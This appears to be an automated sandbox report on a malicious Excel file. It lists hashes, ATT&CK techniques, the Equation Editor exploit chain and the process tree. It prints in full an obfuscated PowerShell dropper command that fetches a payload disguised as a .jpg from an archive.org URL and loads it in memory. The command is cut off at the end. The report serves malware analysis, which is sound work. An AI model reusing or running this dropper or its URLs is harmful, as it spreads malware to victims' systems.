5daccf2d036e313eacb7b0660c8f6c4b4eb48a7bf841f5f85a68eaf08b678553

Analysis

max time kernel
144s
max time network
121s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
17/08/2024, 01:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5daccf2d036e313eacb7b0660c8f6c4b4eb48a7bf841f5f85a68eaf08b678553.xls
Size

445KB
MD5

e07cfed85c1ddf5a98b21de6cb894a18
SHA1

092241ff646b40b753d18973ec61638a0f70fa98
SHA256

5daccf2d036e313eacb7b0660c8f6c4b4eb48a7bf841f5f85a68eaf08b678553
SHA512

0016dc6031bc7f82b7d85ccd6d93e7618eb56d4ff5fb08847c73996a61c7a5670786bb689fec14e3ab704070e472ab8f16ed25bd5f428b0ac104e827e712cf68
SSDEEP

12288:aWkD+1iATCUvwG3Dl6M+ntycfS8ZxGxJygH42DYqI9:dkD+1BCSDinTrZxK4mYqG

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

exe.dropper

https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
19	2368	EQNEDT32.EXE
21	2540	powershell.exe
22	2540	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
996	powershell.exe
2540	powershell.exe

Abuses OpenXML format to download file from external location 2 IoCs

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\Common\Offline\Files\https://jiourl.com/GmwgTs	WINWORD.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe

Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
2368	EQNEDT32.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2008	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
996	powershell.exe
2540	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	996	powershell.exe
Token: SeDebugPrivilege	2540	powershell.exe
Token: SeShutdownPrivilege	1044	WINWORD.EXE

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2008	EXCEL.EXE
2008	EXCEL.EXE
2008	EXCEL.EXE
1044	WINWORD.EXE
1044	WINWORD.EXE

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 2368 wrote to memory of 2272	2368	EQNEDT32.EXE	34
PID 2368 wrote to memory of 2272	2368	EQNEDT32.EXE	34
PID 2368 wrote to memory of 2272	2368	EQNEDT32.EXE	34
PID 2368 wrote to memory of 2272	2368	EQNEDT32.EXE	34
PID 2272 wrote to memory of 996	2272	WScript.exe	35
PID 2272 wrote to memory of 996	2272	WScript.exe	35
PID 2272 wrote to memory of 996	2272	WScript.exe	35
PID 2272 wrote to memory of 996	2272	WScript.exe	35
PID 1044 wrote to memory of 924	1044	WINWORD.EXE	37
PID 1044 wrote to memory of 924	1044	WINWORD.EXE	37
PID 1044 wrote to memory of 924	1044	WINWORD.EXE	37
PID 1044 wrote to memory of 924	1044	WINWORD.EXE	37
PID 996 wrote to memory of 2540	996	powershell.exe	38
PID 996 wrote to memory of 2540	996	powershell.exe	38
PID 996 wrote to memory of 2540	996	powershell.exe	38
PID 996 wrote to memory of 2540	996	powershell.exe	38

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\5daccf2d036e313eacb7b0660c8f6c4b4eb48a7bf841f5f85a68eaf08b678553.xls
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2008

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Abuses OpenXML format to download file from external location
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1044
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:924

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2368
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\mekissedbutterburnwithstrong.vBS"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2272
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J﷽ ★ ㎼㈸㎩Bp﷽ ★ ㎼㈸㎩G0﷽ ★ ㎼㈸㎩YQBn﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩VQBy﷽ ★ ㎼㈸㎩Gw﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩9﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩JwBo﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bw﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩Og﷽ ★ ㎼㈸㎩v﷽ ★ ㎼㈸㎩C8﷽ ★ ㎼㈸㎩aQBh﷽ ★ ㎼㈸㎩Dg﷽ ★ ㎼㈸㎩M﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩z﷽ ★ ㎼㈸㎩DE﷽ ★ ㎼㈸㎩M﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩0﷽ ★ ㎼㈸㎩C4﷽ ★ ㎼㈸㎩dQBz﷽ ★ ㎼㈸㎩C4﷽ ★ ㎼㈸㎩YQBy﷽ ★ ㎼㈸㎩GM﷽ ★ ㎼㈸㎩a﷽ ★ ㎼㈸㎩Bp﷽ ★ ㎼㈸㎩HY﷽ ★ ㎼㈸㎩ZQ﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩G8﷽ ★ ㎼㈸㎩cgBn﷽ ★ ㎼㈸㎩C8﷽ ★ ㎼㈸㎩Mg﷽ ★ ㎼㈸㎩3﷽ ★ ㎼㈸㎩C8﷽ ★ ㎼㈸㎩aQB0﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩bQBz﷽ ★ ㎼㈸㎩C8﷽ ★ ㎼㈸㎩dgBi﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩Xw﷽ ★ ㎼㈸㎩y﷽ ★ ㎼㈸㎩D﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩Mg﷽ ★ ㎼㈸㎩0﷽ ★ ㎼㈸㎩D﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩Nw﷽ ★ ㎼㈸㎩y﷽ ★ ㎼㈸㎩DY﷽ ★ ㎼㈸㎩Xw﷽ ★ ㎼㈸㎩y﷽ ★ ㎼㈸㎩D﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩Mg﷽ ★ ㎼㈸㎩0﷽ ★ ㎼㈸㎩D﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩Nw﷽ ★ ㎼㈸㎩y﷽ ★ ㎼㈸㎩DY﷽ ★ ㎼㈸㎩LwB2﷽ ★ ㎼㈸㎩GI﷽ ★ ㎼㈸㎩cw﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩Go﷽ ★ ㎼㈸㎩c﷽ ★ ㎼㈸㎩Bn﷽ ★ ㎼㈸㎩Cc﷽ ★ ㎼㈸㎩Ow﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩Hc﷽ ★ ㎼㈸㎩ZQBi﷽ ★ ㎼㈸㎩EM﷽ ★ ㎼㈸㎩b﷽ ★ ㎼㈸㎩Bp﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩bgB0﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩PQ﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩E4﷽ ★ ㎼㈸㎩ZQB3﷽ ★ ㎼㈸㎩C0﷽ ★ ㎼㈸㎩TwBi﷽ ★ ㎼㈸㎩Go﷽ ★ ㎼㈸㎩ZQBj﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩BT﷽ ★ ㎼㈸㎩Hk﷽ ★ ㎼㈸㎩cwB0﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩bQ﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩E4﷽ ★ ㎼㈸㎩ZQB0﷽ ★ ㎼㈸㎩C4﷽ ★ ㎼㈸㎩VwBl﷽ ★ ㎼㈸㎩GI﷽ ★ ㎼㈸㎩QwBs﷽ ★ ㎼㈸㎩Gk﷽ ★ ㎼㈸㎩ZQBu﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩Ow﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩Gk﷽ ★ ㎼㈸㎩bQBh﷽ ★ ㎼㈸㎩Gc﷽ ★ ㎼㈸㎩ZQBC﷽ ★ ㎼㈸㎩Hk﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bl﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩9﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩J﷽ ★ ㎼㈸㎩B3﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩YgBD﷽ ★ ㎼㈸㎩Gw﷽ ★ ㎼㈸㎩aQBl﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩EQ﷽ ★ ㎼㈸㎩bwB3﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩b﷽ ★ ㎼㈸㎩Bv﷽ ★ ㎼㈸㎩GE﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩BE﷽ ★ ㎼㈸㎩GE﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bh﷽ ★ ㎼㈸㎩Cg﷽ ★ ㎼㈸㎩J﷽ ★ ㎼㈸㎩Bp﷽ ★ ㎼㈸㎩G0﷽ ★ ㎼㈸㎩YQBn﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩VQBy﷽ ★ ㎼㈸㎩Gw﷽ ★ ㎼㈸㎩KQ﷽ ★ ㎼㈸㎩7﷽ ★ ㎼㈸㎩CQ﷽ ★ ㎼㈸㎩aQBt﷽ ★ ㎼㈸㎩GE﷽ ★ ㎼㈸㎩ZwBl﷽ ★ ㎼㈸㎩FQ﷽ ★ ㎼㈸㎩ZQB4﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩9﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩WwBT﷽ ★ ㎼㈸㎩Hk﷽ ★ ㎼㈸㎩cwB0﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩bQ﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩FQ﷽ ★ ㎼㈸㎩ZQB4﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩LgBF﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩YwBv﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩aQBu﷽ ★ ㎼㈸㎩Gc﷽ ★ ㎼㈸㎩XQ﷽ ★ ㎼㈸㎩6﷽ ★ ㎼㈸㎩Do﷽ ★ ㎼㈸㎩VQBU﷽ ★ ㎼㈸㎩EY﷽ ★ ㎼㈸㎩O﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩Ec﷽ ★ ㎼㈸㎩ZQB0﷽ ★ ㎼㈸㎩FM﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩By﷽ ★ ㎼㈸㎩Gk﷽ ★ ㎼㈸㎩bgBn﷽ ★ ㎼㈸㎩Cg﷽ ★ ㎼㈸㎩J﷽ ★ ㎼㈸㎩Bp﷽ ★ ㎼㈸㎩G0﷽ ★ ㎼㈸㎩YQBn﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩QgB5﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩ZQBz﷽ ★ ㎼㈸㎩Ck﷽ ★ ㎼㈸㎩Ow﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bh﷽ ★ ㎼㈸㎩HI﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩BG﷽ ★ ㎼㈸㎩Gw﷽ ★ ㎼㈸㎩YQBn﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩PQ﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩Cc﷽ ★ ㎼㈸㎩P﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩8﷽ ★ ㎼㈸㎩EI﷽ ★ ㎼㈸㎩QQBT﷽ ★ ㎼㈸㎩EU﷽ ★ ㎼㈸㎩Ng﷽ ★ ㎼㈸㎩0﷽ ★ ㎼㈸㎩F8﷽ ★ ㎼㈸㎩UwBU﷽ ★ ㎼㈸㎩EE﷽ ★ ㎼㈸㎩UgBU﷽ ★ ㎼㈸㎩D4﷽ ★ ㎼㈸㎩Pg﷽ ★ ㎼㈸㎩n﷽ ★ ㎼㈸㎩Ds﷽ ★ ㎼㈸㎩J﷽ ★ ㎼㈸㎩Bl﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩BG﷽ ★ ㎼㈸㎩Gw﷽ ★ ㎼㈸㎩YQBn﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩PQ﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩Cc﷽ ★ ㎼㈸㎩P﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩8﷽ ★ ㎼㈸㎩EI﷽ ★ ㎼㈸㎩QQBT﷽ ★ ㎼㈸㎩EU﷽ ★ ㎼㈸㎩Ng﷽ ★ ㎼㈸㎩0﷽ ★ ㎼㈸㎩F8﷽ ★ ㎼㈸㎩RQBO﷽ ★ ㎼㈸㎩EQ﷽ ★ ㎼㈸㎩Pg﷽ ★ ㎼㈸㎩+﷽ ★ ㎼㈸㎩Cc﷽ ★ ㎼㈸㎩Ow﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bh﷽ ★ ㎼㈸㎩HI﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩BJ﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩Bl﷽ ★ ㎼㈸㎩Hg﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩9﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩J﷽ ★ ㎼㈸㎩Bp﷽ ★ ㎼㈸㎩G0﷽ ★ ㎼㈸㎩YQBn﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩V﷽ ★ ㎼㈸㎩Bl﷽ ★ ㎼㈸㎩Hg﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩Ek﷽ ★ ㎼㈸㎩bgBk﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩e﷽ ★ ㎼㈸㎩BP﷽ ★ ㎼㈸㎩GY﷽ ★ ㎼㈸㎩K﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bh﷽ ★ ㎼㈸㎩HI﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩BG﷽ ★ ㎼㈸㎩Gw﷽ ★ ㎼㈸㎩YQBn﷽ ★ ㎼㈸㎩Ck﷽ ★ ㎼㈸㎩Ow﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩bgBk﷽ ★ ㎼㈸㎩Ek﷽ ★ ㎼㈸㎩bgBk﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩e﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩D0﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩Gk﷽ ★ ㎼㈸㎩bQBh﷽ ★ ㎼㈸㎩Gc﷽ ★ ㎼㈸㎩ZQBU﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩e﷽ ★ ㎼㈸㎩B0﷽ ★ ㎼㈸㎩C4﷽ ★ ㎼㈸㎩SQBu﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩ZQB4﷽ ★ ㎼㈸㎩E8﷽ ★ ㎼㈸㎩Zg﷽ ★ ㎼㈸㎩o﷽ ★ ㎼㈸㎩CQ﷽ ★ ㎼㈸㎩ZQBu﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩RgBs﷽ ★ ㎼㈸㎩GE﷽ ★ ㎼㈸㎩Zw﷽ ★ ㎼㈸㎩p﷽ ★ ㎼㈸㎩Ds﷽ ★ ㎼㈸㎩J﷽ ★ ㎼㈸㎩Bz﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩YQBy﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩SQBu﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩ZQB4﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩LQBn﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩w﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩LQBh﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩CQ﷽ ★ ㎼㈸㎩ZQBu﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩SQBu﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩ZQB4﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩LQBn﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bh﷽ ★ ㎼㈸㎩HI﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩BJ﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩Bl﷽ ★ ㎼㈸㎩Hg﷽ ★ ㎼㈸㎩Ow﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bh﷽ ★ ㎼㈸㎩HI﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩BJ﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩Bl﷽ ★ ㎼㈸㎩Hg﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩r﷽ ★ ㎼㈸㎩D0﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bh﷽ ★ ㎼㈸㎩HI﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩BG﷽ ★ ㎼㈸㎩Gw﷽ ★ ㎼㈸㎩YQBn﷽ ★ ㎼㈸㎩C4﷽ ★ ㎼㈸㎩T﷽ ★ ㎼㈸㎩Bl﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩ZwB0﷽ ★ ㎼㈸㎩Gg﷽ ★ ㎼㈸㎩Ow﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩GI﷽ ★ ㎼㈸㎩YQBz﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩Ng﷽ ★ ㎼㈸㎩0﷽ ★ ㎼㈸㎩Ew﷽ ★ ㎼㈸㎩ZQBu﷽ ★ ㎼㈸㎩Gc﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bo﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩PQ﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩CQ﷽ ★ ㎼㈸㎩ZQBu﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩SQBu﷽ ★ ㎼㈸㎩GQ﷽ ★ ㎼㈸㎩ZQB4﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩LQ﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩CQ﷽ ★ ㎼㈸㎩cwB0﷽ ★ ㎼㈸㎩GE﷽ ★ ㎼㈸㎩cgB0﷽ ★ ㎼㈸㎩Ek﷽ ★ ㎼㈸㎩bgBk﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩e﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩7﷽ ★ ㎼㈸㎩CQ﷽ ★ ㎼㈸㎩YgBh﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩ZQ﷽ ★ ㎼㈸㎩2﷽ ★ ㎼㈸㎩DQ﷽ ★ ㎼㈸㎩QwBv﷽ ★ ㎼㈸㎩G0﷽ ★ ㎼㈸㎩bQBh﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩D0﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩Gk﷽ ★ ㎼㈸㎩bQBh﷽ ★ ㎼㈸㎩Gc﷽ ★ ㎼㈸㎩ZQBU﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩e﷽ ★ ㎼㈸㎩B0﷽ ★ ㎼㈸㎩C4﷽ ★ ㎼㈸㎩UwB1﷽ ★ ㎼㈸㎩GI﷽ ★ ㎼㈸㎩cwB0﷽ ★ ㎼㈸㎩HI﷽ ★ ㎼㈸㎩aQBu﷽ ★ ㎼㈸㎩Gc﷽ ★ ㎼㈸㎩K﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩k﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bh﷽ ★ ㎼㈸㎩HI﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩BJ﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩Bl﷽ ★ ㎼㈸㎩Hg﷽ ★ ㎼㈸㎩L﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩g﷽ ★ ㎼㈸㎩CQ﷽ ★ ㎼㈸㎩YgBh﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩ZQ﷽ ★ ㎼㈸㎩2﷽ ★ ㎼㈸㎩DQ﷽ ★ ㎼㈸㎩T﷽ ★ ㎼㈸㎩Bl﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩ZwB0﷽ ★ ㎼㈸㎩Gg﷽ ★ ㎼㈸㎩KQ﷽ ★ ㎼㈸㎩7﷽ ★ ㎼㈸㎩CQ﷽ ★ ㎼㈸㎩YwBv﷽ ★ ㎼㈸㎩G0﷽ ★ ㎼㈸㎩bQBh﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩BC﷽ ★ ㎼㈸㎩Hk﷽ ★ ㎼㈸㎩d﷽ ★ ㎼㈸㎩Bl﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩I﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩9﷽ ★ ㎼㈸㎩C﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩WwBT﷽ ★ ㎼㈸㎩Hk﷽ ★ ㎼㈸㎩cwB0﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩bQ﷽ ★ ㎼㈸㎩u﷽ ★ ㎼㈸㎩EM﷽ ★ ㎼㈸㎩bwBu﷽ ★ ㎼㈸㎩HY﷽ ★ ㎼㈸㎩ZQBy﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩XQ﷽ ★ ㎼㈸㎩6﷽ ★ ㎼㈸㎩Do﷽ ★ ㎼㈸㎩RgBy﷽ ★ ㎼㈸㎩G8﷽ ★ ㎼㈸㎩bQBC﷽ ★ ㎼㈸㎩GE﷽ ★ ㎼㈸㎩cwBl﷽ ★ ㎼㈸㎩DY﷽ ★ ㎼㈸㎩N﷽ ★ ㎼㈸㎩BT﷽ ★ ㎼㈸㎩HQ﷽ ★ ㎼㈸㎩cgBp﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩Zw﷽ ★ ㎼㈸㎩o﷽ ★ ㎼㈸㎩CQ﷽ ★ ㎼㈸㎩YgBh﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩ZQ﷽ ★ ㎼㈸㎩2﷽ ★ ㎼㈸㎩DQ﷽ ★ ㎼㈸㎩QwBv﷽ ★ ㎼㈸㎩G0﷽ ★ ㎼㈸㎩bQBh﷽ ★ ㎼㈸㎩G4﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩﷽ ★ ㎼㈸㎩p﷽ ★ ㎼㈸㎩Ds﷽ ★ ㎼㈸㎩J﷽ ★ ㎼㈸㎩Bs﷽ ★ ㎼㈸㎩G8﷽ ★ ㎼㈸㎩YQBk﷽ ★ ㎼㈸㎩GU﷽ ★ ㎼㈸㎩Z﷽ ★ ㎼㈸㎩BB﷽ ★ ㎼㈸㎩HM﷽ ★ ㎼㈸㎩cwBl﷽ ★ ㎼㈸㎩G0﷽ ★ ㎼㈸㎩YgBs﷽ ★ 